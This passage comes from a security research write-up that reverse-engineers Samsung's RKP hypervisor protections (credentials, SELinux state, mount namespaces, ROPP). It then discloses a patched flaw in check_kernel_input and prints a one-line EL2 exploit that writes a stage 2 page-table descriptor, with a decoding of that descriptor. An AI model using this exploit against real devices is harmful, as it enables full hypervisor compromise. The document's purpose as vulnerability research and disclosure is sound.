memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
cmd_type = cred_param->type;
*(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
if (cmd_type != RKP_CMD_COPY_CREDS) {
    curr_mm_va = *(curr_task + 8 * rkp_cred->TASK_MM_OFFSET);
if (curr_mm_va) {
curr_mm = rkp_get_pa(curr_mm_va);
curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
} else {
curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xFFFFFFFFC000);
}
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
if (cmd_type == RKP_CMD_OVRD_CREDS) {
if (cred_param->use_cnt <= 1)
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
else
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
}
} else {
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
}
sec_ptr_va = cred_param->sec_ptr;
cred_ro_va = cred_param->cred_ro;
if (sec_ptr_va) {
sec_ptr = rkp_get_pa(sec_ptr_va);
targ_secptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
    targ_secptr = rkp_get_pa(targ_secptr_va);
if (chk_invalid_sec_ptr(sec_ptr) || !targ_secptr || !curr_secptr) {
uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", sec_ptr_va, sec_ptr,
targ_secptr);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", sec_ptr_va, targ_secptr, curr_secptr);
} else {
curr_sid = *(curr_secptr + 4);
targ_sid = *(targ_secptr + 4);
if (rkp_deferred_inited && targ_sid <= 19 && curr_sid >= 21) {
uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", targ_sid, curr_sid);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", targ_sid, curr_sid, 0);
} else {
memcpy(sec_ptr, targ_secptr, rkp_cred->SP_SIZE);
*(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = sec_ptr_va;
*(sec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = cred_ro_va;
}
}
} else {
uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
rkp_policy_violation("Data Protection Violation", 0, 0, 0);
}
if (rkp_cred->VERIFIED_BOOT_STATE)
return;
  targ_flags = *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET);
if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
parent_task = rkp_get_pa(parent_task_va);
parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
parent_cred = rkp_get_pa(parent_cred_va);
parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
if ((parent_flags & CRED_FLAG_MARK_PPT) != 0)
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
}
}
rkp_assign_creds does the following:

- it gets the current task_struct by getting SP_EL0;
  - it can either contain the current task_struct directly;
  - or the current thread_info, in which case the task_struct is at offset 0 (see arch/arm64/include/asm/current.h and the sketch after this list).
- it verifies that the back pointer of the current struct cred to the struct task_struct is correct;
- it verifies that the back pointer of the current struct task_security_struct to the struct cred is correct;
- it verifies that the target struct cred is marked as CRED in the physmap;
- if the current struct cred doesn't have any flags set:
  - if none of the current UID, EUID, GID and EGID is a "Linux on Dex" ID (in the 0x61A80000 range):
    - if VERIFIED_BOOT_STATE is 0, it checks if this is a privilege escalation using rkp_check_pe and from_zyg_adbd (these checks are skipped otherwise);
      - rkp_check_pe (check privilege escalation) checks if the current ID is > AID_SYSTEM and the target ID is <= AID_SYSTEM. It checks the UID, GID, EUID and EGID;
      - from_zyg_adbd returns true if the current task is flagged, or if it has a parent that is either zygote, zygote64 or adbd (meaning it is a child of these tasks);
    - if both functions return true, it calls rkp_privilege_escalation to trigger a violation;
    - in any case, the "Linux on Dex" checks below are then skipped;
  - otherwise, it sets on the current struct cred the flag CRED_FLAG_LOD (8).
- if the "Linux on Dex" checks were not skipped:
  - it compares each of the target UID, EUID, GID and EGID (unless equal to 3003) with the current one using check_privilege_escalation;
  - if any of them denotes a privilege escalation, it calls rkp_privilege_escalation.
- it copies the target struct cred into the RO one;
- it sets the use_cnt field of the RO struct cred to the value given as argument;
- if the command is RKP_CMD_COPY_CREDS (e.g. called from copy_creds):
  - it sets the back pointer of the RO struct cred to the struct task_struct given as argument.
- if the command is RKP_CMD_CMMIT_CREDS (called from commit_creds) or RKP_CMD_OVRD_CREDS (called from override_creds):
  - it gets the PGD from the struct mm_struct of the current struct task_struct, or from TTBR1_EL1 if there is none;
  - it sets the bp_pgd and bp_task fields of the RO struct cred to that PGD and to the current task;
  - if the command is RKP_CMD_OVRD_CREDS:
    - if the usage counter given as argument is lower than or equal to 1, it unsets the flag CRED_FLAG_ORPHAN (1);
    - otherwise, it sets the flag CRED_FLAG_ORPHAN (1).
- it calls chk_invalid_sec_ptr on the struct task_security_struct given as argument;
  - it must be marked as SEC_PTR in the physmap;
  - and be properly aligned (on SP_BUFF_SIZE).
- if the current SID >= SECINITSID_SYSCTL_NET_UNIX and the target SID <= SECINITSID_SYSCTL_KERNEL, then this is a privilege escalation;
  - (the SECINITSID_xxx values are defined in security/selinux/include/flask.h).
- it copies the target struct task_security_struct into the RO one;
- it sets the security field of the RO struct cred to the RO one;
- it sets the bp_cred field of the RO struct task_security_struct to the RO one;
- finally, unless VERIFIED_BOOT_STATE is non-zero (in which case it returns immediately), if the target struct cred has the flag CRED_FLAG_MARK_PPT:
  - if the parent task's struct cred also has the flag CRED_FLAG_MARK_PPT:
    - it sets on the RO struct cred the flag CRED_FLAG_CHILD_PPT.
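The first list item refers to the way the arm64 kernel itself retrieves current. For reference, here is the mainline implementation (recent kernels store the task_struct pointer directly in SP_EL0, while older ones stored the thread_info there):

```c
// from arch/arm64/include/asm/current.h (mainline kernel, shown for reference)
static __always_inline struct task_struct *get_current(void)
{
    unsigned long sp_el0;

    asm ("mrs %0, sp_el0" : "=r" (sp_el0));

    return (struct task_struct *)sp_el0;
}

#define current get_current()
```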
RKP also protects the ss_initialized global variable that is used by the kernel to indicate whether SELinux has been initialized (i.e. whether a policy has been loaded). The kernel calls RKP in security_load_policy to set it to 1. This protection has likely been added because ss_initialized has been used to disable SELinux in a previous RKP bypass.
int security_load_policy(void *data, size_t len)
{
// ...
uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
// ...
}
On the hypervisor side, rkp_cmd_selinux_initialized
calls rkp_selinux_initialized
.
int64_t rkp_cmd_selinux_initialized(saved_regs_t* regs) {
rkp_selinux_initialized(regs);
return 0;
}
void rkp_selinux_initialized(saved_regs_t* regs) {
// ...
ss_initialized_va = regs->x2;
value = regs->x3;
ss_initialized = rkp_get_pa(ss_initialized_va);
if (ss_initialized) {
if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
} else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
if (value == 1) {
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
} else {
rkp_policy_violation("RKP_3ba4a93d");
}
} else if (ss_initialized == rkp_cred->SELINUX) {
if (value == 1 || *ss_initialized != 1) {
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
} else {
rkp_policy_violation("RKP_cef38ae5");
}
} else {
rkp_policy_violation("RKP_ced87e02");
}
} else {
uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
}
}
rkp_selinux_initialized does the following:

- it checks that the target variable is located in the kernel's .rodata section;
- if the target is the ss_initialized variable known to RKP, it only allows setting it to 1;
- if the target is the variable referenced by the SELINUX field of rkp_cred, it only allows the write if the new value is 1 or if the current value is not 1 yet;
- any other target, or any other value, triggers a policy violation.

Similarly to the credentials, the struct vfsmount structures are allocated in read-only pages. This structure also gets a new field for storing the back pointer to the struct mount that owns it.
// from include/linux/mount.h
struct vfsmount {
// ...
struct mount *bp_mount; /* pointer to mount*/
// ...
} __randomize_layout;
This back pointer also gets verified on each SELinux hook via the call to security_integrity_current.
// from fs/namespace.c
extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
struct mount *root = NULL;
struct nsproxy *nsp = NULL;
int ret = 0;
if((in_interrupt()
|| in_softirq())){
return 0;
}
nsp = current->nsproxy;
if(!ns_prot || !nsp ||
!nsp->mnt_ns) {
return 0;
}
root = current->nsproxy->mnt_ns->root;
if(root != root->mnt->bp_mount){
printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
ret = 1;
}
return ret;
}
// from security/selinux/hooks.c
int security_integrity_current(void)
{
// ...
if ( rkp_cred_enable &&
// ...
cmp_ns_integrity())) {
// ...
}
// ...
}
We can see that cmp_ns_integrity
checks if the back pointer is valid.
When the kernel allocates a new mount in alloc_vfsmnt of fs/namespace.c, it makes a call to RKP to initialize the back pointer of the struct vfsmount.
// from fs/namespace.c
void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}
static int mnt_alloc_vfsmount(struct mount *mnt)
{
struct vfsmount *vfsmnt = NULL;
vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
if(!vfsmnt)
return 1;
spin_lock(&mnt_vfsmnt_lock);
rkp_init_ns(vfsmnt,mnt);
// vfsmnt->bp_mount = mnt;
mnt->mnt = vfsmnt;
spin_unlock(&mnt_vfsmnt_lock);
return 0;
}
static struct mount *alloc_vfsmnt(const char *name)
{
// ...
err = mnt_alloc_vfsmount(mnt);
if (err)
goto out_free_cache;
// ...
}
On the hypervisor side, rkp_cmd_init_ns
calls rkp_init_ns
.
int64_t rkp_cmd_init_ns(saved_regs_t* regs) {
rkp_init_ns(regs);
return 0;
}
int64_t chk_invalid_ns(uint64_t vfsmnt) {
if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE)
return 1;
rkp_phys_map_lock(vfsmnt);
if (!is_phys_map_ns(vfsmnt)) {
uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
rkp_phys_map_unlock(vfsmnt);
return 1;
}
rkp_phys_map_unlock(vfsmnt);
return 0;
}
void rkp_init_ns(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt)) {
memset(vfsmnt, 0, rkp_cred->NS_SIZE);
*(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
}
}
rkp_init_ns
calls chk_invalid_ns
to check if the struct vfsmount
is marked as NS
in the physmap and is properly aligned (on NS_BUFF_SIZE). If it is, it zeroes the structure and sets the back pointer to the owning struct mount.
To set fields of the struct vfsmount
, once again the kernel calls RKP.
It does so with the following kernel and hypervisor functions:
Field | Kernel Function | Hypervisor Function
---|---|---
mnt_sb | rkp_set_mnt_root_sb | rkp_cmd_ns_set_root_sb
mnt_flags | rkp_assign_mnt_flags | rkp_cmd_ns_set_flags
data | rkp_set_data | rkp_cmd_ns_set_data
On the kernel side, the functions are:
// from fs/namespace.c
void rkp_set_mnt_root_sb(struct vfsmount *mnt, struct dentry *mnt_root,struct super_block *mnt_sb)
{
uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}
void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}
void rkp_set_data(struct vfsmount *mnt,void *data)
{
uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}
void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f |= flags;
rkp_assign_mnt_flags(mnt,f);
}
void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f &= ~flags;
rkp_assign_mnt_flags(mnt,f);
}
On the hypervisor side, the functions are:
int64_t rkp_cmd_ns_set_root_sb(saved_regs_t* regs) {
rkp_ns_set_root_sb(regs);
return 0;
}
void rkp_ns_set_root_sb(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt)) {
*vfsmnt = regs->x3;
*(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
}
}
int64_t rkp_cmd_ns_set_flags(saved_regs_t* regs) {
rkp_ns_set_flags(regs);
return 0;
}
void rkp_ns_set_flags(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt))
*(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
}
int64_t rkp_cmd_ns_set_data(saved_regs_t* regs) {
rkp_ns_set_data(regs);
return 0;
}
void rkp_ns_set_data(saved_regs_t* regs) {
// ...
vfsmnt = rkp_get_pa(regs->x2);
if (!chk_invalid_ns(vfsmnt))
*(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
}
Each of these functions calls chk_invalid_ns to check if the structure is valid before setting its field.
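As an illustration of how this is meant to be used on the kernel side, wherever a stock kernel would write mnt->mnt_flags directly, the Samsung kernel has to go through one of these wrappers since the structure lives on a read-only page. Here is a hypothetical example, not taken from the sources:

```c
/* Hypothetical example: the struct vfsmount is read-only for the kernel,
 * so flag updates go through RKP instead of a direct write. */
static void example_make_mount_readonly(struct vfsmount *mnt)
{
    /* stock kernel:  mnt->mnt_flags |= MNT_READONLY; */
    rkp_set_mnt_flags(mnt, MNT_READONLY);   /* ends up in rkp_cmd_ns_set_flags at EL2 */
}
```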
The last command is called when a new mount point is being created.
// from fs/namespace.c
#define KDP_MOUNT_ROOTFS "/root" //system-as-root
#define KDP_MOUNT_ROOTFS_LEN strlen(KDP_MOUNT_ROOTFS)
#define KDP_MOUNT_PRODUCT "/product"
#define KDP_MOUNT_PRODUCT_LEN strlen(KDP_MOUNT_PRODUCT)
#define KDP_MOUNT_SYSTEM "/system"
#define KDP_MOUNT_SYSTEM_LEN strlen(KDP_MOUNT_SYSTEM)
#define KDP_MOUNT_VENDOR "/vendor"
#define KDP_MOUNT_VENDOR_LEN strlen(KDP_MOUNT_VENDOR)
#define KDP_MOUNT_ART "/apex/com.android.runtime"
#define KDP_MOUNT_ART_LEN strlen(KDP_MOUNT_ART)
#define KDP_MOUNT_ART2 "/com.android.runtime@1"
#define KDP_MOUNT_ART2_LEN strlen(KDP_MOUNT_ART2)
#define ART_ALLOW 2
enum kdp_sb {
KDP_SB_ROOTFS = 0,
KDP_SB_ODM,
KDP_SB_SYS,
KDP_SB_VENDOR,
KDP_SB_ART,
KDP_SB_MAX
};
int art_count = 0;
static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt)
{
if (!mount_point || !mnt)
return;
if (!odm_sb &&
!strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
} else if (!rootfs_sb &&
!strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!sys_sb &&
!strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!vendor_sb &&
!strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
} else if (!art_sb &&
!strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
} else if ((art_count < ART_ALLOW) &&
!strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
if (art_count)
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
art_count++;
}
}
static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
int mnt_flags, const char *name, void *data)
{
// ...
buf = kzalloc(PATH_MAX, GFP_KERNEL);
if (!buf){
kfree(buf);
return -ENOMEM;
}
dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);
if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW))
rkp_populate_sb(dir_name,mnt);
kfree(buf);
// ...
}
do_mount
calls do_new_mount
which calls rkp_populate_sb
. This function checks the path of the mount point against specific paths, and then calls RKP.
The predefined paths are:
- /root
- /product
- /system
- /vendor
- /apex/com.android.runtime
- /com.android.runtime@1
On the hypervisor side, rkp_cmd_ns_set_sys_vfsmnt
calls rkp_ns_set_sys_vfsmnt
.
int64_t rkp_cmd_ns_set_sys_vfsmnt(saved_regs_t* regs) {
rkp_ns_set_sys_vfsmnt(regs);
return 0;
}
void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
// ...
if (!rkp_cred) {
uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
return;
}
art_sb = rkp_get_pa(regs->x2);
vfsmnt = rkp_get_pa(regs->x3);
mount_point = regs->x4;
if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
uh_log('L', "rkp_kdp.c", 945, "Invalid source vfsmnt %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
return;
}
if (!art_sb) {
uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
return;
}
mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
*art_sb = mnt_sb;
switch (mount_point) {
case KDP_SB_ROOTFS:
*rkp_cred->SB_ROOTFS = mnt_sb;
break;
case KDP_SB_ODM:
*rkp_cred->SB_ODM = mnt_sb;
break;
case KDP_SB_SYS:
*rkp_cred->SB_SYS = mnt_sb;
break;
case KDP_SB_VENDOR:
*rkp_cred->SB_VENDOR = mnt_sb;
break;
case KDP_SB_ART:
*rkp_cred->SB_ART = mnt_sb;
break;
}
}
rkp_ns_set_sys_vfsmnt does the following:

- it calls chk_invalid_ns to check if the source struct vfsmount is valid;
- it copies the mnt_sb field of the struct vfsmount into the kernel's superblock pointer, which is one of odm_sb, rootfs_sb, sys_sb, vendor_sb or art_sb;
- it also sets the corresponding field of the rkp_cred hypervisor structure to the same value, which is one of SB_ROOTFS, SB_ODM, SB_SYS, SB_VENDOR or SB_ART.

One last check enabled by the mount namespace protection is done in flush_old_exec
of fs/exec.c
. This function is called (amongst others) by load_elf_binary
, so this is likely to prevent the abuse of call_usermodehelper
as it has been used in a previous Samsung RKP bypass.
// from fs/exec.c
static int kdp_check_sb_mismatch(struct super_block *sb)
{
if(is_recovery || __check_verifiedboot) {
return 0;
}
if((sb != rootfs_sb) && (sb != sys_sb)
&& (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
return 1;
}
return 0;
}
static int invalid_drive(struct linux_binprm * bprm)
{
struct super_block *sb = NULL;
struct vfsmount *vfsmnt = NULL;
vfsmnt = bprm->file->f_path.mnt;
if(!vfsmnt ||
!rkp_ro_page((unsigned long)vfsmnt)) {
printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
return 1;
}
sb = vfsmnt->mnt_sb;
if(kdp_check_sb_mismatch(sb)) {
printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
return 1;
}
return 0;
}
#define RKP_CRED_SYS_ID 1000
static int is_rkp_priv_task(void)
{
struct cred *cred = (struct cred *)current_cred();
if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
return 1;
}
return 0;
}
int flush_old_exec(struct linux_binprm * bprm)
{
// ...
if(rkp_cred_enable &&
is_rkp_priv_task() &&
invalid_drive(bprm)) {
panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
}
// ...
}
flush_old_exec calls is_rkp_priv_task to check if the task requesting the execution of a binary is privileged (one of its IDs is <= 1000). If it is, it calls invalid_drive to check the mount point from which the binary is started.

invalid_drive checks that the struct vfsmount of the mount point is protected by RKP (it must be located on a read-only page). Then, if the device is not running in recovery and its bootloader is not unlocked, it checks that the superblock is one of the predefined ones (rootfs_sb, sys_sb, odm_sb, vendor_sb or art_sb).
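As an illustration, on a locked device that is not in recovery, a privileged task executing a binary that does not live on one of the whitelisted mounts should hit the panic path above (hypothetical example):

```c
/* Illustrative only: a task with an ID <= 1000 exec'ing a binary stored on a
 * non-whitelisted mount (here /data) is expected to trigger the
 * "KDP_NS_PROT: Illegal Execution of file" panic in flush_old_exec. */
#include <unistd.h>

int main(void) {
    execl("/data/local/tmp/mybinary", "mybinary", (char *)NULL);
    return 1;  /* only reached if execl() itself failed */
}
```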
If you remember the first section, ROPP is only enabled for high-end Snapdragon devices. So for this subsection we will be looking at the kernel source code and RKP binary for a Snapdragon device.
rkp_cmd_jopp_init
and rkp_cmd_ropp_init
are probably called by S-Boot/the bootloader.
int64_t rkp_cmd_jopp_init() {
uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
return 0;
}
int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
// ...
something = virt_to_phys_el1(regs->x2);
if (*something == 0x4A4C4955) {
memcpy(0xB0240020, something, 80);
if (MEMORY[0x80001000] == 0xCDEFCDEF)
memcpy(0x80001020, something, 80);
uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
} else {
uh_log('W', "rkp.c", 515, "RKP_e08bc280");
}
return 0;
}
rkp_cmd_jopp_init
does nothing. rkp_cmd_ropp_init checks if the structure it was given as argument starts with the magic value it expects (0x4A4C4955). If it does, it copies it to 0xB0240020. If the memory at 0x80001000 contains another magic value (0xCDEFCDEF), it copies the structure's contents to 0x80001020 too.
rkp_cmd_ropp_save
is probably called by S-Boot/the bootloader, while rkp_cmd_ropp_reload
is called by the kernel in __secondary_switched
of arch/arm64/kernel/head.S
(booting a secondary core).
// from arch/arm64/include/asm/rkp_cfp.h
/*
* secondary core will start a forked thread, so rrk is already enc'ed
* so only need to reload the master key and thread key
*/
.macro ropp_secondary_init ti
reset_sysreg
//load master key from rkp
ropp_load_mk
//load thread key
ropp_load_key \ti
.endm
.macro ropp_load_mk
#ifdef CONFIG_UH
push x0, x1
push x2, x3
push x4, x5
mov x1, #0x10 //RKP_ROPP_RELOAD
mov x0, #0xc002 //UH_APP_RKP
movk x0, #0xc300, lsl #16
smc #0x0
pop x4, x5
pop x2, x3
pop x0, x1
#else
push x0, x1
ldr x0, = ropp_master_key
ldr x0, [x0]
msr RRMK, x0
pop x0, x1
#endif
.endm
// from arch/arm64/kernel/head.S
__secondary_switched:
// ...
ropp_secondary_init x2
// ...
ENDPROC(__secondary_switched)
int64_t rkp_cmd_ropp_save() {
return 0;
}
int64_t rkp_cmd_ropp_reload() {
set_dbgbvr5_el1(MEMORY[0xB0240028]);
return 0;
}
rkp_cmd_ropp_save
does nothing and rkp_cmd_ropp_reload
simply sets the DBGBVR5_EL1
(the system register that holds the RRMK - the "master key") to the value at 0xB0240028.
In this section, we are going to reveal a now-fixed vulnerability that allows getting code execution at EL2. We will exploit this vulnerability on our Exynos device, but it should also work on Snapdragon devices.
Here is some information about the binaries that we are looking at:

- A515FXXU3BTF4 (our Exynos device), with an RKP binary built on Feb 27 2020;
- G973USQU4ETH7 (a Snapdragon device), with an RKP binary built on Feb 25 2020.
There are 2 important functions that you might notice we haven't detailed yet: uh_log
and rkp_get_pa
.
int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
// ...
// ...
if (level == 'D')
uh_panic();
return res;
}
uh_log
does some fairly standard string formatting and printing, but it also does more than that. If the log level that was given as the first argument is 'D'
, then it also calls uh_panic
. This will become important in a moment.
Now let's look at rkp_get_pa
(called in a lot of command handlers to verify kernel input):
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr)
return 0;
if (vaddr < 0xFFFFFFC000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0)
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
else
paddr = vaddr - KIMAGE_VOFFSET;
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
}
check_kernel_input(paddr);
return paddr;
}
If the address is not in the fixmap region, it will call virt_to_phys_el1
. If the translation doesn't succeed, it calculates it from the KIMAGE_VOFFSET
. Otherwise, if the address is in the fixmap region, it calculates it from the PHYS_OFFSET
. Finally, it calls check_kernel_input
that will check if this address can be used.
int64_t virt_to_phys_el1(int64_t vaddr) {
// ...
if (vaddr) {
at_s12e1r(vaddr);
par_el1 = get_par_el1();
if ((par_el1 & 1) != 0) {
at_s12e1w(vaddr);
par_el1 = get_par_el1();
}
if ((par_el1 & 1) != 0) {
if ((get_sctlr_el1() & 1) != 0) {
uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
if (!has_printed_stack_contents) {
has_printed_stack_contents = 1;
print_stack_contents();
}
has_printed_stack_contents = 0;
}
vaddr = 0;
} else {
vaddr = par_el1 & 0xFFFFFFFFF000 | vaddr & 0xFFF;
}
}
return vaddr;
}
virt_to_phys_el1
uses the AT S12E1R
(stage 1 & 2 at EL1 read access) and AT S12E1W
(stage 1 & 2 at EL1 write access) to get the physical address. If it fails and the MMU is enabled, it will print the stack contents.
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = memlist_contains_addr(&protected_ranges, paddr);
if (res)
res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
return res;
}
check_kernel_input
checks if the physical address is contained in the protected_ranges memlist which, if you recall the previous sections, contains:

- the hypervisor memory, added in pa_restrict_init;
- the physmap, added in init_cmd_initialize_dynamic_heap.
So it checks if we're trying to give an address inside uH memory. But when the check fails (i.e. the address does fall into a protected range), it calls uh_log
with 'L'
as the first argument. uh_log
will return and execution will continue like nothing ever happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.
Exploiting this vulnerability is as simple as calling one of the command handlers with the right arguments. For example, we can use the command #5 (named RKP_CMD_WRITE_PGT3
), which calls the rkp_l3pgt_write
function that we have seen earlier. Now it is only a matter of finding what to write and where.
In our one-liner exploit, we are targeting the stage 2 page tables and adding a Level 2 block descriptor spanning over the hypervisor memory. By setting the S2AP
field to 0b11, the memory region becomes writable from EL1, and because the WXN
bit set in s1_enable
only applies to the address translation at EL2, we can freely modify the hypervisor code.
Here is the exploit in its full glory:
uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);
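For the curious, the magic value 0x870004fd decodes as a stage 2 level 2 block descriptor. The sketch below rebuilds it field by field; the assumption that the hypervisor lives at physical address 0x87000000 on this device is derived from the value itself and is not stated elsewhere in this post:

```c
/* Minimal sketch decoding the level 2 block descriptor used in the exploit. */
#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t output_address = 0x87000000;   /* 2MB-aligned block assumed to cover hypervisor memory */
    uint64_t desc = output_address
                  | (1ULL << 10)            /* AF: access flag */
                  | (3ULL << 6)             /* S2AP = 0b11: readable and writable at stage 2 */
                  | (0xFULL << 2)           /* MemAttr: normal, write-back cacheable memory */
                  | (1ULL << 0);            /* bit 0 set, bit 1 clear: block descriptor */
    printf("%#llx\n", (unsigned long long)desc);   /* prints 0x870004fd */
    return 0;
}
```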
We noticed that binaries built after May 27 2020
include a patch for this vulnerability, but we don't know whether it was privately disclosed or found internally. It affected devices with Exynos and Snapdragon chipsets.
Let's take a look at the latest firmware update available for our research device to see what the changes are.
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = memlist_contains_addr(&protected_ranges, paddr);
if (res) {
uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
}
return res;
}
Interestingly, instead of simply changing the log level, they duplicated the call to uh_log
